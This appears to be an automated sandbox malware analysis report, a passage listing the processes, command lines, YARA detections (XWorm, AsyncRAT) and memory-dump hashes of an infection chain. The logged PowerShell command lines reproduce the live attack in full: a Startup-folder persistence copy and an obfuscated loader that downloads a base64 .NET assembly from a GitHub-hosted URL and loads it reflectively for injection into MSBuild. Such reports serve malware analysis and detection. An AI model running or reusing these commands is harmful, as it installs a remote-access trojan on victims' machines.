                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:4
                                                                                                    Start time:02:56:05
                                                                                                    Start date:07/10/2024
                                                                                                    Path:C:\Windows\System32\PING.EXE
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:ping 127.0.0.1 -n 10
                                                                                                    Imagebase:0x7ff6487e0000
                                                                                                    File size:22'528 bytes
                                                                                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    Target ID:5
                                                                                                    Start time:02:56:15
                                                                                                    Start date:07/10/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:powershell -command [System.IO.File]::Copy('C:\Windows\system32\k4STQvJ6rV.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.amoimoil.vbs')')
                                                                                                    Imagebase:0x7ff6cb6b0000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:6
                                                                                                    Start time:02:56:17
                                                                                                    Start date:07/10/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdtWHR1cicrJ2wgJysnPSBkMG1odHRwcycrJzonKycvL3Jhdy5naScrJ3RoJysndWJ1c2UnKydyY29uJysndGVuJysndC5jb20nKycvJysnTm9EZXQnKydlY3RPbi9OJysnbycrJ0RlJysndGUnKydjdCcrJ09uLycrJ3JlZicrJ3MvaGVhZHMvbWEnKydpbi9EZXRhJysnaE5vdGgtJysnVi50eHRkMCcrJ207IG1YdGInKydhc2UnKyc2NENvbnRlbnQgPSAoJysnTmV3LU9iamVjdCBTeScrJ3N0ZW0uTicrJ2V0JysnLldlJysnYkNsaWVudCkuJysnRCcrJ293bmwnKydvYWRTdHJpJysnbicrJ2cobVgnKyd0dXInKydsKTsnKycgbVh0YicrJ2luYScrJ3J5QycrJ29udGVuJysndCA9IFtTJysneXN0JysnZW0uQ29uJysndmUnKydydF06OicrJ0YnKydybycrJ20nKydCJysnYXNlNjRTJysndHJpbicrJ2cobVh0YmEnKydzJysnZTYnKyc0Q29uJysndGUnKydudCcrJyk7IG1YdGFzJysnc2UnKydtYicrJ2wnKyd5ID0nKycgW1JlZicrJ2wnKydlY3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzonKydMb2FkJysnKCcrJ21YdGJpbmFyeUNvJysnbnRlbnQpOyBbZG5saWInKycuSScrJ08uJysnSG9tZV06JysnOlZBSSgnKyc3cEswJysnLzQzVnluL2QvZWUuZXRzJysnYScrJ3AvLzpzcHR0aCcrJzdwSycrJywnKycgN3BLZGVzJysnYXQnKydpdmEnKydkbycrJzdwSycrJywnKycgJysnN3AnKydLZGVzYXRpdmFkbycrJzcnKydwSywgN3BLZGVzYXQnKydpdicrJ2FkbzdwSywgJysnN3BLJysnTVNCJysndScrJ2lsZDcnKydwSycrJywgNycrJ3BLN3BLLDdwJysnSzdwSyknKS5SRXBMYWNlKChbY2hhcl0xMDArW2NoYXJdNDgrW2NoYXJdMTA5KSxbc3RyaW5nXVtjaGFyXTM5KS5SRXBMYWNlKCdtWHQnLCckJykuUkVwTGFjZSgoW2NoYXJdNTUrW2NoYXJdMTEyK1tjaGFyXTc1KSxbc3RyaW5nXVtjaGFyXTM0KXwgJiAoICRFTnY6Q09tc3BlY1s0LDE1LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                    Imagebase:0x7ff6cb6b0000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:7
                                                                                                    Start time:02:56:17
                                                                                                    Start date:07/10/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:9
                                                                                                    Start time:02:56:18
                                                                                                    Start date:07/10/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('mXtur'+'l '+'= d0mhttps'+':'+'//raw.gi'+'th'+'ubuse'+'rcon'+'ten'+'t.com'+'/'+'NoDet'+'ectOn/N'+'o'+'De'+'te'+'ct'+'On/'+'ref'+'s/heads/ma'+'in/Deta'+'hNoth-'+'V.txtd0'+'m; mXtb'+'ase'+'64Content = ('+'New-Object Sy'+'stem.N'+'et'+'.We'+'bClient).'+'D'+'ownl'+'oadStri'+'n'+'g(mX'+'tur'+'l);'+' mXtb'+'ina'+'ryC'+'onten'+'t = [S'+'yst'+'em.Con'+'ve'+'rt]::'+'F'+'ro'+'m'+'B'+'ase64S'+'trin'+'g(mXtba'+'s'+'e6'+'4Con'+'te'+'nt'+'); mXtas'+'se'+'mb'+'l'+'y ='+' [Ref'+'l'+'ection.'+'A'+'ssembly]:'+':'+'Load'+'('+'mXtbinaryCo'+'ntent); [dnlib'+'.I'+'O.'+'Home]:'+':VAI('+'7pK0'+'/43Vyn/d/ee.ets'+'a'+'p//:sptth'+'7pK'+','+' 7pKdes'+'at'+'iva'+'do'+'7pK'+','+' '+'7p'+'Kdesativado'+'7'+'pK, 7pKdesat'+'iv'+'ado7pK, '+'7pK'+'MSB'+'u'+'ild7'+'pK'+', 7'+'pK7pK,7p'+'K7pK)').REpLace(([char]100+[char]48+[char]109),[string][char]39).REpLace('mXt','$').REpLace(([char]55+[char]112+[char]75),[string][char]34)| & ( $ENv:COmspec[4,15,25]-JoiN'')"
                                                                                                    Imagebase:0x7ff6cb6b0000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000009.00000002.1617406175.000001FFE6961000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000009.00000002.1617406175.000001FFE6961000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:12
                                                                                                    Start time:02:56:23
                                                                                                    Start date:07/10/2024
                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                    Imagebase:0xb80000
                                                                                                    File size:262'432 bytes
                                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000C.00000002.2579124201.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000C.00000002.2579124201.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:13
                                                                                                    Start time:02:56:40
                                                                                                    Start date:07/10/2024
                                                                                                    Path:C:\Users\user\AppData\Local\XClient.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\AppData\Local\XClient.exe"
                                                                                                    Imagebase:0x820000
                                                                                                    File size:262'432 bytes
                                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:14
                                                                                                    Start time:02:56:40
                                                                                                    Start date:07/10/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:15
                                                                                                    Start time:02:56:48
                                                                                                    Start date:07/10/2024
                                                                                                    Path:C:\Users\user\AppData\Local\XClient.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\AppData\Local\XClient.exe"
                                                                                                    Imagebase:0x970000
                                                                                                    File size:262'432 bytes
                                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:16
                                                                                                    Start time:02:56:48
                                                                                                    Start date:07/10/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:22
                                                                                                    Start time:02:57:53
                                                                                                    Start date:07/10/2024
                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 1916
                                                                                                    Imagebase:0x1000000
                                                                                                    File size:483'680 bytes
                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Reset < >
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1555923781.00007FFB4A090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A090000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ffb4a090000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5cb2631850949585c363c5941ad601b80c4a2e164544ad51ca0ea59a702ed585
                                                                                                      • Instruction ID: f5ca11bb2ae199fff01ceb72d12a06911b0bd3698e6959f9103dd323d2f7364f
                                                                                                      • Opcode Fuzzy Hash: 5cb2631850949585c363c5941ad601b80c4a2e164544ad51ca0ea59a702ed585
                                                                                                      • Instruction Fuzzy Hash: 52E127A290EA8A4FE756FF7888951B5BFA8EF5A310F1801FAD44DCB293D9189805C351
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1555923781.00007FFB4A090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A090000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ffb4a090000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6d4de1621a9bc719c681aaf0492948a8f121fd0a52cbbb999a56dace45cbacf9
                                                                                                      • Instruction ID: c75bcd5a6b84bcc3ac3d777508dab2450d315a7c6f63e92582397d1d82d6d494
                                                                                                      • Opcode Fuzzy Hash: 6d4de1621a9bc719c681aaf0492948a8f121fd0a52cbbb999a56dace45cbacf9
                                                                                                      • Instruction Fuzzy Hash: 90A1E7A290E7C70FE796AF7489E4165BFB9AF5A310F1900FAC089CF2D3C9095C498352
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.1555760808.00007FFB49FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49FC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ffb49fc0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                      • Instruction ID: ca1b72a0a55d97d25a8dc89da541995cc4c2ba634c85834c2b3996a38c25bd4d
                                                                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                      • Instruction Fuzzy Hash: AB01A77010CB0C4FD744EF0CE051AA5B3E0FB89364F10052DE58AC36A1DA36E882CB41
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1707044776.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffb4ae00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                      • Instruction ID: 676e102fc392bee182fa12fe49f15ae986dc4f91bb02ad7cbf914f314f74578f
                                                                                                      • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                      • Instruction Fuzzy Hash: 9601A77011CB0D8FD744EF0CE051AA6B7E0FB85324F10056DE58AC3655D632E892CB41

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:3.7%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:24
                                                                                                      Total number of Limit Nodes:2
                                                                                                      execution_graph 3980 7ffb4ae0bc3b 3981 7ffb4ae0bc40 CreateProcessW 3980->3981 3982 7ffb4ae0bce3 3981->3982 3984 7ffb4ae0bd3e 3982->3984 3985 7ffb4ae0bd76 3982->3985 3986 7ffb4ae0bdb1 3985->3986 3987 7ffb4ae0bd9c 3985->3987 3986->3984 3987->3986 3988 7ffb4ae0be8f Wow64SetThreadContext 3987->3988 3989 7ffb4ae0bec3 3988->3989 3989->3984 4002 7ffb4ae07b82 4003 7ffb4ae0c240 ResumeThread 4002->4003 4005 7ffb4ae0c2bb 4003->4005 4006 7ffb4ae07b52 4007 7ffb4ae0c120 WriteProcessMemory 4006->4007 4009 7ffb4ae0c1e1 4007->4009 4014 7ffb4ae07b12 4015 7ffb4ae0be30 Wow64SetThreadContext 4014->4015 4017 7ffb4ae0bec3 4015->4017 3990 7ffb4ae0c0f4 3991 7ffb4ae0c0fd WriteProcessMemory 3990->3991 3993 7ffb4ae0c1e1 3991->3993 3994 7ffb4ae0c215 3995 7ffb4ae0c223 ResumeThread 3994->3995 3997 7ffb4ae0c2bb 3995->3997

                                                                                                      Control-flow Graph

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000009.00000002.1681658015.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4ae00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a09f5c847138cb99ca62237afa0baa4b796e3a9127dd6777f9835ce1b896ac37
                                                                                                      • Instruction ID: c25f44fc5f84ae820d3c23ebdbba9142c3c829226e6b67d090008c7629c30017
                                                                                                      • Opcode Fuzzy Hash: a09f5c847138cb99ca62237afa0baa4b796e3a9127dd6777f9835ce1b896ac37
                                                                                                      • Instruction Fuzzy Hash: 4F41257190CA5C8FDB59EF58D84A6FA7BE4FB65321F0401ABD049C7152DB30A8468B91

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000009.00000002.1681658015.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4ae00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MemoryProcessWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3559483778-0
                                                                                                      • Opcode ID: 1995a59501f4f81ffc1520359fc0050aa5f688df385b3e1a5e84a0ea74b29a9f
                                                                                                      • Instruction ID: 4211bf97058d4c5b6f7ec2fc2faba4ada29223753a621fd6e288ce850036ab0c
                                                                                                      • Opcode Fuzzy Hash: 1995a59501f4f81ffc1520359fc0050aa5f688df385b3e1a5e84a0ea74b29a9f
                                                                                                      • Instruction Fuzzy Hash: 6341097090CB588FDB18EF58D8466E97BF0FBA9311F14426FE489D3252CB74A845CB92

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000009.00000002.1681658015.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4ae00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ContextThreadWow64
                                                                                                      • String ID:
                                                                                                      • API String ID: 983334009-0
                                                                                                      • Opcode ID: f78564430a8386f0eac80a1b5229ab2606b9c773e7e0dad017f26ccfea8ff396
                                                                                                      • Instruction ID: a84f588102fd4fe27e164cd4a0978d9855781019be8dc3161c691c056861c4e8
                                                                                                      • Opcode Fuzzy Hash: f78564430a8386f0eac80a1b5229ab2606b9c773e7e0dad017f26ccfea8ff396
                                                                                                      • Instruction Fuzzy Hash: D941067190CB988FDB16EF6888856E97FF0FF56320F18429BD448C7197DB64A406CB92

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000009.00000002.1681658015.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4ae00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MemoryProcessWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3559483778-0
                                                                                                      • Opcode ID: a58f09dc448f1cededf4c2050f274cf91db50366c5dc7b8a86fc8c6e177e1fba
                                                                                                      • Instruction ID: 6a6f8beb4708755c48f0e67771ba4b56c5fec5674cfb87ea83ca150e70fe2e83
                                                                                                      • Opcode Fuzzy Hash: a58f09dc448f1cededf4c2050f274cf91db50366c5dc7b8a86fc8c6e177e1fba
                                                                                                      • Instruction Fuzzy Hash: E331C17091CB188FDB18EF59D8466F977E4FBA9311F10426FE089D3251CB70A8458B92

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000009.00000002.1681658015.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4ae00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 963392458-0
                                                                                                      • Opcode ID: b4615ec9d9faf1f94fd27e6033ce5782d8505df11056129a1064bfec7f6f1e02
                                                                                                      • Instruction ID: ca34394a511903655b340f1311b496f46c1aa167baffb5f6d05c735353f87d47
                                                                                                      • Opcode Fuzzy Hash: b4615ec9d9faf1f94fd27e6033ce5782d8505df11056129a1064bfec7f6f1e02
                                                                                                      • Instruction Fuzzy Hash: BE41617191CB18CFDB55EF58D846BD9B7F1FB98310F1042AAD04DA7251CA35A9828F81

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000009.00000002.1681658015.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4ae00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ContextThreadWow64
                                                                                                      • String ID:
                                                                                                      • API String ID: 983334009-0
                                                                                                      • Opcode ID: 224b0ad4e555efc0208e7a0e20f391f6a5d0f0b2d9045d5d736f43b502ac9839
                                                                                                      • Instruction ID: 22beed9da3d3cfcaea6f53c96ffbc9b2efdefc8c0a1217da145c08ef87bc7414
                                                                                                      • Opcode Fuzzy Hash: 224b0ad4e555efc0208e7a0e20f391f6a5d0f0b2d9045d5d736f43b502ac9839
                                                                                                      • Instruction Fuzzy Hash: 1B21D57190CA1C8FDB54EF5CD8897FA7BE5FB65321F14426BD409D3116DB30A8068B91

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000009.00000002.1681658015.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4ae00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ContextThreadWow64
                                                                                                      • String ID:
                                                                                                      • API String ID: 983334009-0
                                                                                                      • Opcode ID: 224b0ad4e555efc0208e7a0e20f391f6a5d0f0b2d9045d5d736f43b502ac9839
                                                                                                      • Instruction ID: 22beed9da3d3cfcaea6f53c96ffbc9b2efdefc8c0a1217da145c08ef87bc7414
                                                                                                      • Opcode Fuzzy Hash: 224b0ad4e555efc0208e7a0e20f391f6a5d0f0b2d9045d5d736f43b502ac9839
                                                                                                      • Instruction Fuzzy Hash: 1B21D57190CA1C8FDB54EF5CD8897FA7BE5FB65321F14426BD409D3116DB30A8068B91

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 66 7ffb4ae0c215-7ffb4ae0c221 67 7ffb4ae0c22c-7ffb4ae0c2b9 ResumeThread 66->67 68 7ffb4ae0c223-7ffb4ae0c22b 66->68 71 7ffb4ae0c2bb 67->71 72 7ffb4ae0c2c1-7ffb4ae0c2dd 67->72 68->67 71->72
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000009.00000002.1681658015.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4ae00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ResumeThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 947044025-0
                                                                                                      • Opcode ID: c8463eba7c90d05d4a08c784295acba96a6d511f6f102f272affbce4cd34da5d
                                                                                                      • Instruction ID: 7e22539f492ffadb105cbc4db92f420d3dd655f18369d4e63812ebbfe3a50a40
                                                                                                      • Opcode Fuzzy Hash: c8463eba7c90d05d4a08c784295acba96a6d511f6f102f272affbce4cd34da5d
                                                                                                      • Instruction Fuzzy Hash: 7021067090CA4C8FDB59EF68D849BB97BE0FF96320F14425EC049D3592CB716416CB81

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 73 7ffb4ae07b82-7ffb4ae0c2b9 ResumeThread 76 7ffb4ae0c2bb 73->76 77 7ffb4ae0c2c1-7ffb4ae0c2dd 73->77 76->77
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000009.00000002.1681658015.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4ae00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ResumeThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 947044025-0
                                                                                                      • Opcode ID: 58ae593c029c43026bcf88c94f9ad5081529b8febb6c53fbf9bf741386f61e5a
                                                                                                      • Instruction ID: 989d3e46d86adab94ee805744ba054332b3035c0d4635f3563ed85c22cf6c538
                                                                                                      • Opcode Fuzzy Hash: 58ae593c029c43026bcf88c94f9ad5081529b8febb6c53fbf9bf741386f61e5a
                                                                                                      • Instruction Fuzzy Hash: 1E219F7090CA0C9FDB58EF98D449BB9BBE0FBA9321F10422ED04AD3651DB71A456CB91

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 122 7ffb4aed031b-7ffb4aed0371 128 7ffb4aed0373 122->128 129 7ffb4aed0374-7ffb4aed0385 122->129 128->129 130 7ffb4aed0387 129->130 131 7ffb4aed0388-7ffb4aed0427 129->131 130->131 136 7ffb4aed0429-7ffb4aed0441 131->136 137 7ffb4aed0443-7ffb4aed0450 131->137 136->137 141 7ffb4aed0456-7ffb4aed0459 137->141 142 7ffb4aed0510-7ffb4aed0528 137->142 141->142 143 7ffb4aed045f-7ffb4aed0477 141->143 146 7ffb4aed0479-7ffb4aed048e 143->146 147 7ffb4aed0490-7ffb4aed0494 143->147 146->147 147->142 149 7ffb4aed0496-7ffb4aed0499 147->149 150 7ffb4aed04c0 149->150 151 7ffb4aed049b-7ffb4aed04be 149->151 152 7ffb4aed04c2-7ffb4aed04c4 150->152 151->152 152->142 153 7ffb4aed04c6-7ffb4aed04d9 152->153 157 7ffb4aed04e0-7ffb4aed04e9 153->157 158 7ffb4aed0502-7ffb4aed050f 157->158 159 7ffb4aed04eb-7ffb4aed04f8 157->159 159->158 161 7ffb4aed04fa-7ffb4aed0500 159->161 161->158
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000009.00000002.1682177107.00007FFB4AED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AED0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4aed0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 104739c47e7f2c97893d018e0af25e1e83442199342ce410b07f0bcafed749f2
                                                                                                      • Instruction ID: 869929df7f076160a29fd79782b9622fa15e3b3eb1ab21b6547dd3abfc091c9d
                                                                                                      • Opcode Fuzzy Hash: 104739c47e7f2c97893d018e0af25e1e83442199342ce410b07f0bcafed749f2
                                                                                                      • Instruction Fuzzy Hash: EB715662A4DB8A4FE7A2BF7898646B47FE4FF56210B2C01FAD45ECB093D9189C05C351

                                                                                                      Control-flow Graph

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000009.00000002.1682177107.00007FFB4AED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AED0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4aed0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8b71fabbc7ebec5f8673705fbc73f8f297461770c0a648c5e5a2cdc3012dd46d
                                                                                                      • Instruction ID: 6e3878746d8cec552e93c5b622a9e1bb0fba1cd3ad97f707758043ca484d9b95
                                                                                                      • Opcode Fuzzy Hash: 8b71fabbc7ebec5f8673705fbc73f8f297461770c0a648c5e5a2cdc3012dd46d
                                                                                                      • Instruction Fuzzy Hash: BC612CA2A4EF870FF7E9BE7889612756AC5FF45210B7800FAD49DC71C3DD1898064352

                                                                                                      Control-flow Graph

